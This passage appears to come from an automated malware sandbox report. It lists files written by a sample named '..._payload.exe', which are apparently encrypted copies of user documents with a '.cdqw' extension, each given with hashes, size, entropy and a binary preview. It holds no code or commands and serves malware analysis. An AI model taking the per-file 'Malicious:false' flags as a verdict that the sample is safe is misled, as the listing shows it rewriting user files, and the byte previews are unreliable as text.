                                                                                                                                                                      SSDEEP:24:vwT7XDTV7NOF6/QZkDe9m9lvZuXZKchCSBUUXfulpZyJWQSYU2bD:vEzh7NOA1Im9lvZuJT7BBul+JWQtnD
                                                                                                                                                                      MD5:90E9645D7BF3D744CF654B1F622E6CA0
                                                                                                                                                                      SHA1:F62FCB1AA63627C9426E77FCB285E2AB14CF5FED
                                                                                                                                                                      SHA-256:6FB149A6F03DB901AB4EF8E0C97A19B775BD45C670F7D2B17A2B40FC81A94A6B
                                                                                                                                                                      SHA-512:95BD9B42D2162FD4100CD08D8F776C9FCA8E123E9C4871D67A4AE0B4C6FAC4E05DFC2CA855D3F548BE209A0564258ADE0D3EAD576EF94667903122820AEA1282
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ..X.<W\....4..X...4..t...L.{a.r/.m.[....wN..q..r..Q..u.O....iJC+...F..Zb.......L.S.V..l....!...../...p.@...7!.`.....Lqf...C.f2D....HO....#~...-.K..yG.*#./.U=.....o%........~A..G..0..\<T99R..k!Ft\8.w.w.E......CI...l..&....g...o...[9.i."M..........T.'J.hh...Z.2qJ..(F@&..q....i:.......a...,x(...k...Z..ty.I@.bO..%.g......I]uK\.c7t7..._X....N.M...huvi.w]8p..7.]....... 3.0..y/3xF...I.K..S.Y..w... I.n_..u.Y.".G.1...Q.G......h......4!..#.~..<..a...T...b.HjS..o...:..<..N....F.>..5.3....n..q.G.FMR.G.3q.|.C.E...H6..5G.j........;...M.....$..j.,......8n.P....U.OW..F..t...hY...`...I12G...+.is..:..D]............Hc.P 1R;... .4.....Z.F..I5.......2.-L.Q#Z.)...t..}-.......[.54..YUq,..bJW.....0...#.j.ue..(...Z....>.....x.+^..@.V........t.R\]L.......O.C1V..v....3..x....p....]..;d.g.A.7..qH.u..5.?v.3...+.d.....D.........L_3...o~..k^....l[.:..'..WM.$.G".96.l9...?J....N|..........W....E.M..,.x]...uQ^...J.i..=R...=..{<...Ns..xDq.5...B.$ ......+..JA...\.A..d....1..8kk

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.853626206034404
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:SAh8ll3wNd0U5jqa5KzMA6pYbvV7/4c05cEg5b+sPHz2bD:SASlhw0AjqEA566bvlwzg5aEAD
                                                                                                                                                                      MD5:613147FD3C05292CA4CDF8119C9B5B15
                                                                                                                                                                      SHA1:DDE745FD4D7B2577468A15DD5728163B58352EAB
                                                                                                                                                                      SHA-256:33594A0EDB00153B3074A972FEE02C69575F8EC36A683BBE67DF031BE6BEB0B7
                                                                                                                                                                      SHA-512:79DF97EC53EE1E6BF5F6726CB0DB0D9FE0AF39F4853552483BA2CAE2136F5F674E2CFDE1A870C959F8143849BF56D53FCC7D2931450F978154CB98B49512494C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NWTVC...^T.:.2.....|#:.B.[xb..$.B....II........\qdT. ..%E3}.."fT.....ix..RF(.s..^..j'.&.&y5p.b1.d..C..rA>q..H..`]S....z{.....c..w.oZ...p&.r...=+...\..0K..:[.$>..[5.u......e..{aW..ndb5.G..^..oh..............d...^'.q......J......A8....}_.y...H..w9.?%..J.....[w...O...M..P..2...!$.K.,N..4..d.<_M.'7..............w...js*|o...s..i..-y....`...._..Z].A.N..>..>...<. . l+,..KY......&:.)...n....!..m..Gv...kd-..r.nv.]...!L.7..h0..r.U.......Ip.L.E.Us3=......$.....l...Uv.....j<........Y.I.%p..mrT.L^'...#..yg..G ..4wY..k#..z....;h0.._...>"...:...vl5y............Ue...v+%.Hr.wg..m.b'.l...G..]r8....0.. ...(...,.R..9..Y.W.....*.Xh........2..B..DE.6IC......}.....+... .b.. .........?\..42.>.v.=....(..S.....8k}.+Y....%.R.p...WX....^.jm.=..%.,..b_U.|E]...N......-.).Z.{,^q.ATXu.....M..r.*......S.K..1.w..H.\....s&..i.M.B.i.....z..R.]..f..^..._...c..4...7J)...._.SBJn.....\qf..#t.O....R..VHW.#.4.6Gv..........%e......q...6..zX....`;gf.%N.F..._,Z..S......S...m,

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.86580383825765
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Dn4uYmBa8OczfkVsUqdwg2nJqAH10kAKBks6X02xKENyPNURTW5GU+CAU2gGH5iE:A2ZOczfkVsUqdwjJqgbBkd021NyVURTb
                                                                                                                                                                      MD5:62CF8486AD0D928B646614458A0678FC
                                                                                                                                                                      SHA1:AE81425A071A2C3D6300A6E146892D2604C01C6B
                                                                                                                                                                      SHA-256:C74445EBA43819C59BC405DA99EE62998E8D5B38670494B1E944A238E430F35B
                                                                                                                                                                      SHA-512:10AB94D7B52BFAF0A3D2636EED9BE80B60D54187861CB41411023012076E91ED80FCB381B2946034CDB0A7A6346574226DCC7329144F46D1BEA0749017F14174
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NWTVCS.`.\....kr......'..G<..".I.j.!...|..H.....~.+...A..Z...Mv..R...3...a..2...R!wBQ6.......]..Y7=.... ...y82P..t|.2w.]@.).W.. u6m5...b..I....y..]B../.l..$......&..a...c.....-S....9('a..~%.njp..S...;x....._.g....R.mP.n.k.H.f....^..!\b....^l7.e ..fS....ZZ.x*O.y....o.0.....l.....d....m..Q$....GB.-!4"|....~,...4y..?..g.fl ^(.I..3.p..3F.6.F..B.Q..&%0q..`....J.@......J.X...PA.\.R,.....:..Gu9a."Y.Q.6.S.+....|.......S_....<{..x~...4...=.*&%..`q..r.W...".6.<.;.......G....d;?.^...@h'.$.lg..'..4....>./..\..K.r%.t3.Ka..D.{QF..i..~..=7u...z@`..z..v....^;.2W."mQ.6.~..O....8.... .....<.;...@._.,<.nH...t......b..?..-..b.2.}M..5PI.W.;-^(..?.ZFRX..NY+......Ry.+l..........P...c]XQ.2......u.....=.Z4....S.\.u..s...-...K..8..Q.c...).|.. ...lj..B..f5pb..Y8...;...^qj+._.......W...@(WPZ..U.%..A....od.V.`".>...&J2Jy.....E.y..H.*926....NU...0..U.=.R."...L.3..k..zr@.=]..y.(..i.8voK....":.o....."......6...@Tz.....B....$5...........0...G..u...../..d...3#`./k."...W.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.863132706843393
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:t/7/uHJ87ptT2pJQEKtcx5xFWm2WKDLdsEmxtERju0+J6a3mQJk49iZo2bD:tAwpB2pJRgcxx2WguxR0+8oJHgbD
                                                                                                                                                                      MD5:8E5E21FD41E7BA4B9D47A82EB30A89E6
                                                                                                                                                                      SHA1:29064920E57AF8746EA62A75E746241F59E5A9A6
                                                                                                                                                                      SHA-256:236648FFC8A42779177A66FF8FB7AD4BC335588358013C7259E82C6AB12400F7
                                                                                                                                                                      SHA-512:24F89B0557F97F1C5FFCA55A480D0756AE4C7B3BC41723B8FB0876A57E692F364C04581D6E2AB8FA53A402E120FAA68541B7FCD91FA360BF9F67CF130C3687E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC|.#..o.......".}.=.]..~...j..g.a.D.?.h.........i...-...m.,s...f.=...e..q..0N.P.NwR..%.......D1s8w....4..g.fo..;..x..y.:.Ru..N...-.Vx......`......V......%.X.:."J&...E..S`QB...X."....D.!v...N...;y,).B...C$3.m.9\8.o...Q&[.c.F.X..[4x....V;..x...!.1K.,.5.g..Tq/...l.Pn]W..q.V.hd...(K.....r{.....Dy...S...%..;....a....I..#.0/.]PJ:.y.[..:.B..z._.E....S6H.(s]..B.I...L..5k.6.=qP..GBGD.......cC..........o?9.*.T...f:..1....".hs..t.....`z/6%.e................hqm.....^n.y*.[.;.......<....mi.@R......9.......P....z.li/m*....o.dl..v..J.F.Y....+k.&...Yi....L.1..r.|P...z(.dx...Ub....]....9....<a(..d..?...Og..p.....P.h..[.T*(.)<[B..v4.B>........qKEC....fr......ewb.r.G.\0.;.4...xr..G..e..Y..{.E...N.+....^.!4.......s.JH.|...jmW.$=..d...!.6j..9..@....Q.w...-....H?.q%..._Q9.].h+6..J..".Q...}KctMM'...j...*.)..b^.s...&.7.t.Pp.....i.{`..1..).'.Q.....^/.$..yw......(..%..^.e...a..kF...`h..s\`&>./[...)R".,......[.B.ib.F\}...k...n..-.....8X.........G#..

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.864082161845112
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EE6eZiFAV7XaQ6vY1Li9HV+MW7D1I6Q+/tfKJEr8Q3J1o5HNsr4IOy0A42bD:96S0AVD56AFiPGU+lCM8Q5Mtsr3OBwD
                                                                                                                                                                      MD5:7789A15A31BE11F35C482D968C9689E8
                                                                                                                                                                      SHA1:CD1A284C3D5F4B37758978AF0EEF8C47D621D546
                                                                                                                                                                      SHA-256:13C5E2C01A81F378B0D260D9E91759D314F9A00E69D72B8A7DEB904DB3574C9E
                                                                                                                                                                      SHA-512:93DC3BF145A36286EB147683853CAECF4B1EEA3A0C4047D7EC8D22F9C1CF664150C7C02025105521E534A4E86E60DBAB48AA1EE2BF5E6120741C16995C101659
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC.6...=...U.H....k.+.y4...F.o....yR..J.x.L.......4......m9.m..!..Q..Q=}/.*U.-8j.v.]lX...$]..".S.....D>n......h.0...D.....0.9..GL]O.&...3v\.=.*.R.F.{....^7..c>......0.}.E@...z...p#..\=..+-.........R.v...V.WY.......(...t..l._.[.._.H.Jx.........Z...^+Yk.>......d..R.Z.".O.?.+....E.58u.Pm~..<...j..h.)....._.T..m..P.=.p..'..E...i..cv..U$.'..h9.F.gR..f7..9..^:?K...."....:.?.RH.....j.....O....*3P/>r.s5..OF.As....|..e..Y..>=~....<<.HX..w..>^......4~D...7.....#.....Z...<V..E......@C..-.^.D9....A..."..@K.`..C..._7p.. ...DGC..u.i.v.V....a7.!..}Q.......k*.z.#..].vdf.Mr......a..e..Npm.!..+I....3=.#.+Te...O.x.....y:..j\..E=Y.....r...c..>V...|.m.g.o...s...eQ5.!....Mk..._..;.p.d.4.f)3.b...=../E.*ktPo!s...kAX.~r....T|.....+Jq....$...4D..e....X....\.......Q7ARQ....eyxV.....@....... c.y.Y.(;......H.........A....=....E..Z..r.!V..\.%'H.!.T>.{..C..@....nu..B..?{.].3r.1.....<#.........@m.K\..*....'..n.+..u...,.>....:M.;\.k.Tu....9"..$...d.F. T.JK...r2...

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\PIVFAGEAAV.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835585720556146
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o2L2BWc9vkApvJ46rJGLmupsQWNm/OcWEs3pHC+VuOQmqnH2Pezfp3nVhC2bD:oc2/7pvJ4eJKs/wzURC+VOXoezfp3nVv
                                                                                                                                                                      MD5:AA1A49A634D8C55DFD0F79184EFA89F0
                                                                                                                                                                      SHA1:D573B87CFA9E5931E7A0592CFAE6335AE25BD1FC
                                                                                                                                                                      SHA-256:4F698C7EB400EC6E77CC8BB4B42DFF6DDD6EE5FBEB36F332C49EC55706BD4966
                                                                                                                                                                      SHA-512:30A970E4D10913602DA19E3F09796143F86B01FB329D00C70AA7BCB5FD47EB461104A08CB6EA7EA46DB2B5AB6E5776076452B1455AC63FE5A6B05C1E22B5F7A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PIVFA...1.....Th..q>.E3:.(.. (]._6.......ZD........K...lu....e..".z..~...2Gu<9..R.DD...pf.:..P....BQo..>._..:......S..c`N.M.....;...?......P..[..-...5..+}..."&.n.O..A..M.^..BVU..l.e...."$..B...I..w!..uT.z5....j......zy..z...B....A..O|3,.1..?.g...yq.&.@..p.|..c.....hd.1.i.s.@u..m$..........h&..B.M.s......8.~b.n...i....tO.Oq.z......8......L..iy.[. E......i.A.....~.&...I.v/..u24_...H.F.1=;D...y.8.fl#..b...GJJ.....Fh.S...Q...."xV,.uW.-..fY.4.....&...t.P.).....|x....@.....4.."./.h.bX......n..C.6.....$.1....|.U...3R...w...y..|=s....v/..fp..g..e..Lz.=..D*.p..c.I..8.8.y.I.c...8C.9..".8...g.q.LfH..G.'&@#O.8..Om.g.D....1....i%..]...T9..........9.&./Ka.I6./..m..Z.Q.,\...hII..@....7...n.hdE...Ki.....T..../....Fo...w'.,.....w._.Y/..V9..HX+.m.`.`r.._a.cM...;k...^[.^wuc.m....1I8.S0..#......O}<0..........j......Y....V!&>.......D...A.V...N.]..t....'..}zLpR5.`,1%..vY.).V.....~..;-.#</Y..#15..)....L.[Y4F*..6....5.?...#.Rv..:.*...Q...Ei..Q.......v...XT..ly.NLD..g@._

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.846575070620486
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YqZNXMC3lP9YRH54pJhQXjpz1kuMXgm3sh1bwXpQVsDdLeLUbUHTg4x2bD:1ZO+Q/+JhQzc0m3s54QVMhSHE4KD
                                                                                                                                                                      MD5:447D1390BEC2A8EEFF0F5FB612B6C7B6
                                                                                                                                                                      SHA1:A1067DFB957DC052B6F04DF872DDAB8CEEBC678A
                                                                                                                                                                      SHA-256:ABD450DB8B3E2EEC9533B8D3ABC7445FA2183D23401C7E1F709984370014B8B0
                                                                                                                                                                      SHA-512:07050DD2A74DEDB77421890DC966390987EA8698E114EFCE0F0F0C292D76E9BAA86AE54E5757FC4F7F57D96996DA234CB71E58D1625C578B820300CFA33C7E6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PIVFA...K{m........)b..T...u!..F.!.$..DcR..E.#x...=........q.....|Q.|...n\.Q...y..z..."vyr. ._.*q......L8{6...d.Pxia...@.W<......Z,..........n9VZ......-. ....At.r...C.g.J.....Z...8.L.d....a..z.....K.B.i..PE....c.Zw`?ry..@..oC..l....Y'mT..AQ.....q.....Y.K.zY.&d>.-..5.y(......r..Y.8..:.*....N.uk.8.29(.jM...~.WB....K.0...........+.fx..MJ.L.,.o..H.A.f.ah.M.3.ca0.@..A.7._a.J|0.........$p@... ..3.{H.%1<.].H.z.Hi.CNa..`.....(.;.].J5..J.VBO.l.o..G...Ot.tT@...f.Er...K. .....!.N...<...h*.3..`h.:\E.............V...S*w.^.;.E..w..LIX.@(..m.Z.(.x|.._.@......4G.v....z....sV...p..d2:!...[...-.E/Y..... ..#* z{t....,J%.].:.._l.#\3&.a.!t........wV5+e^.y..=..oFQ....Z.t..........CoK...Z.cpp..".(N.!J..U...X?.7.~%......&~A..c/..[y..H..:.rJ...O.w.....]..9f........IY.....t.)...pK9.v...=.?.3N"..oQ9.x.2....6-E...Tk.e..._GM.Mh..s<O...].........8I.....'4.U..u1.bl.._g.)h..9.).....&PE......."N.l.r...X..!$.....]..+BY8.....^S u.+q...E...IfJX......#..h.maPu......mt.....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835778456318958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:t/tENJ2CXvd+1Ue7j7o+AAYbt7YQl7gckS6YsDTKQQZ7Q2kJQIM6rjRsGBQcaZ32:xC39E/j7ovAYR7HfkDYsKQi7Q2AQsnzJ
                                                                                                                                                                      MD5:1439AEB8143D82C85165EC21CD9DB98E
                                                                                                                                                                      SHA1:B49BF28EF688027B897251B3E1BF33118505A1EA
                                                                                                                                                                      SHA-256:8F8EA74618C6A1FDD2E379C30652C6F3633CB312C7C32A0782019C3ABFB45794
                                                                                                                                                                      SHA-512:D42842370DEB9F33B1D8AE6643B27A6D0EBD0054ECDC7BF78A34D5F7CCD71A7BBE29813CA8DF821C9BDD0CB034C528B3120323F5D1459C7661DA2B825E766DCA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PIVFA.-.q....T."...F..R..S.+0..:.$Cs..;. 6..F.0.....fZ.+..........>..7|.y8......N5.M()Z._..\..BM..h.Vg...s%WP.p.........z.......;G.S6Zp.(\..P*.Z.xi...U...6..Wh..B....(W.vU.H.;.G.e. ).p@....G. ........&..G.;I...D.i,.Y...P2=*...h.c.J.....h.?!.........e!CC......L..#H.7.x.,.5N......J..&q.'j.w.3..D....=...4..-.....P..Ru^o7.O.U.&..w%0...J.....p.......Z.'..\@.o.../|`C..o8...}.d'.g#k".W..>|.Y..A.".}.....b$.X..b<`...ms.5.|$.......Q .3.Q].Q.....e.....V.0..4...8u..).._ewc..c.....B...&.XN...)...\...,a{l"..0..5k...v...m..E..........=M.....G,PAv.n..U...U.95..AyD.......A..5g..K\....XOR.b%.^.AT.....m;.F)...`..U.O..CDLn.~.&..3..e..Nv..m#...Z..?.!W....4.5......pR......gv...KIU..e...*$.6.gC...5 .....`..b..J"..Y_f!.'.^MX.....x.)Z.-.....;WCZ{.....J...N<........o.Z.x.;R.\...........Ru.4O..-...'..5*^.'.l{..b......6!...lFB..2<U#.j$...L.0.w..."$,.=...!.....d{W.hXF\f+K)...w.{.jGLP...D._D..........|..w.U.Br.[.....X~.q.1..)....^..u...qU.....\.....b.ju....s6..:n....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85305209823438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RULdN6CX2ayLSlXgMqADU1PH7mTrKKePa7k6d6kugW4AgKqz4dKXM2bD:6dNL2ayLcgMqA4d9Yb6zqzqKPD
                                                                                                                                                                      MD5:4AA4D901169B2D90A5D0BBB527A0BAB3
                                                                                                                                                                      SHA1:A2EDDFEE483969D8D13AE3C57F2F525CEDC72C88
                                                                                                                                                                      SHA-256:BFF6D4B98B1A94754D4D1C066BDA597EB84268A24FD01211522507EC2DF5BCFB
                                                                                                                                                                      SHA-512:B5B162107FFC215974BDE3AD53AB10DA4040E6983EFA5F2E5805369601B823D3F1838AE2BFB2A7FBA7B0629069F3E4ACC50FFE9CEA1D743108CD99A9D0DB7667
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QCOIL..S...gJd..ao......".n...\.q.~#......i.*.......C.G.n....`..6.?...8$..r.......\.....7..x....W..1......L.,.|M.c.....Y....H...cNK...o_.{ZRW.......o.D.....4I...M|...I..R.....2.^..>5i../o..o.....K. ..{M...........-....&.jQ.O...5..E...P>...b..)Co......V.l...vBP.[.TVB..#..a.X.....Oe^..x...Y.....{-.+A. +..S.s...5..&.=.0$."@.f.E...R......d....H....ER,.Hr-.1.!...N.,...9..,y..r.3f..D........... ..'$h8.......+.P..}..e.t......'.......Ie..N...G.u.......[.Y.....G..w3.}e.|.....7..5Ad...J..=.O...`.mn...M..\....{.{.<.VH[N.U.r...x]{;....W%d7..{....<..v..q....n..G..|V.?.f....&.........!.......>....H...m.k......N(._$.z...>..U..j.......W.<T3.$..>.4.yV...........t<e.3. D...A....qG.c. 8<.a....P}.#~....p~.A1."...w...9n....t....J....y.O..;j.J.".#l.2.]]...g...O&.`..VxF...{..._.6.Z.p..f.#..{..N6.......@..$C....Wc<a..@...."z.i..S..?....L._.JJr...qc)"...aF.*..)$Z....s...'vn...XZ.X.=.......<* .W..<.....-.s.9....C...P..UY..3"m3 .]..6..V..N.j....[.u.&..j....D..U.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8454960629271815
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UkDj+Y4impnkJsq0Ik6UoVU/FBMw3SX1GWWGXLQ+RCVdICBnq6UBZ2bD:UknD4iQO0IksU/FsGDGk+0VdII+ByD
                                                                                                                                                                      MD5:6E77A87BEF15AE3FC4DF1D81A6A3E2AF
                                                                                                                                                                      SHA1:5002F3AC0117FC4A52C3FA801C4DA5F1AD2D1B5E
                                                                                                                                                                      SHA-256:D59C51C264EA50C3C2ECAE2D0E9783565E5481A4C7D3A5ACF3F06E2307C5D98F
                                                                                                                                                                      SHA-512:ED89BC77F1A92C1AA2F5EA873D58F9D714C12827053E65AF6236E3FF614D4FEB2C1C6D445C31BEA3FC9A6827730908B8A5AA0C29175617A519F547BF987F591E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QCOIL...QT.~..8O.S[...T..-...;&..I.1D..D....ncT.0?.-.(;...L*...=...zy.f..Ep..B:..Q7.Ui.MV...(......<..EA..!.!..*.*Q.X..8=.&....W..6i.........NF... ...=^....P...Gr:..G.....2...L..50.6.......}...s(..o.^.i4C-ZZdg...M.Bo.mR+../UgBk..J.....3..$.i..h........]r.)....mo...K..9..Q.!j..[L....u.\.B@...)...2X.4...3...vg1.>....X..........q%.;(..!.]i..#..XLi..M.....zi3."....u..t=..X...V.+.)..G7.........Q.........A...4 J...O..-.M....c.b.."...u~...f..h.d....g4....#@]}&Yk. f...B)k..}n.z......fyr..lX.....s!|..r..?6..K.a...8....e...+.F...wf6$M<.........Y....T9G..=....&B.F.fD....am..v.....:..MJ..-..5....X-=V..gcg..3<.."E=..K..|>.S.r......{........QF........&.iN..&.k.9N....'.~wd..s.q.]5.2.......0.h../i.G..ZM..+.........X...$.6".0.-.^8Ev......HJr.2R`..ew.O..n7.h...y.).RR...dsGq.8E.N..?....r.g<...C?..h.k......l..K.......*.....n...=.m(.H.q.!...M.S\..F|...#Q8;<z.tg.j.Q.S.KV...r.h......[./'.|..\..H..y.5}..QUW.t..a..T...8..v.Ns..\....f.../..I59.7vs..Z..k.b...

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.868884917228763
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6/Ju9uZLcNbjwSZG2rNlpWuMCn5vNotNljaerCdjpnsEae6y2bD:obwNbjwSZGyDW4nLotNljfrOjpnJKD
                                                                                                                                                                      MD5:61EE33BB9CFA303AA1AE53A3E2A24F3C
                                                                                                                                                                      SHA1:700EBC4B805E2509EF8118253436B84EF678F31C
                                                                                                                                                                      SHA-256:A4D0EE78B41C6DA98C18409A4C2D348592983D871A1DC46D9B770B55C0086782
                                                                                                                                                                      SHA-512:82DF92815F62441123F0DC1C4870952ED782C074D93C9A86FF0F6205E1E10B00C1B36290474757674C28BFD47F64CFD0BD25361BF7DA079147041DA0A7AB3DB8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:QCOIL{.EJR.A.N.C=".W.~..l..n....:..Tf8.....ci.UW..*.QS.i.j.......q.6p.2kF|?.I..VyvG..%.6....h9..K.....@B....p.K.R...}W.,V...@/.}a2.g....P..<.-..[...k...t..Ah..m}.J...w.*.}..!17....9..P..'.X...&..^..!C2OWV..yZ..MD{..<..D..Fo.....kQ..=@.A...^.H{..h...n?k..R.,...{.O3.q..-&ZZ.....;..j@./X&...F..[....O.`...?..X..R3.o......m. 7i;U...^.0.`aF.....Z.......N.........!...JC......5i.V.W....#j..S.&e*.K..r.+.].&...i.h8I1.%........g..J.C.....)..c.=.^....6...jO..i...:.XG.L6Z<.B..uc.S>.<.....r.g>..._.r1......O...U.:1..8.&h.g'...H?'y.u.e...v.......O....o..=A<..y........I.P(...ywl.H....0Y..r.wH3...[.6W.R.....[.K}...D8...5$..Xr.#z..)t.c.U.. %.8...........eC....T.{.rs.....c..C]..d..a...eh!..h........}{.....!k.V.5. >...a.T-mD31....0......N.P.qks....!\.%..QC.I4..[....F...g:.5...Q.u!.q<.3...J.;...fK..@............V.2.a.J........7.......4.....2.......9+).v..P..)gNv..d...O.....%....}.z.j.3MqW..BF..E5....;.jo.Y.....L..N..j..?.%<.v.E .,.d.*U1".=..Q..l!..."..H"............

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UMMBDNEQBN.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.866824071105435
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o4dAyFmvVlhhNusOW2oZArQMZD4DT/9Cq6t/VmjC+h/X/gKTcHAWfprRyifoV2bD:o4NgvVrz44erpZEfPCVmeUv/ELpl9flD
                                                                                                                                                                      MD5:615590CF46621F2773DF7E8E3E731A49
                                                                                                                                                                      SHA1:BA225D1A79F88D8B7E28452C9953908E776722C7
                                                                                                                                                                      SHA-256:8FC57EA3FD495883C6FF3A6748B0A4EEAC0598EE150C2FC1AFDD0A152282AD83
                                                                                                                                                                      SHA-512:161D17C348AD6D5ADB343CA941D36E6530575BF22C733DE203C68C63275C3EFE009B45F225E74577CDF22F888DF65D8D9274EC736C9380135F2E6C652EA086A1
                                                                                                                                                                      Malicious:false
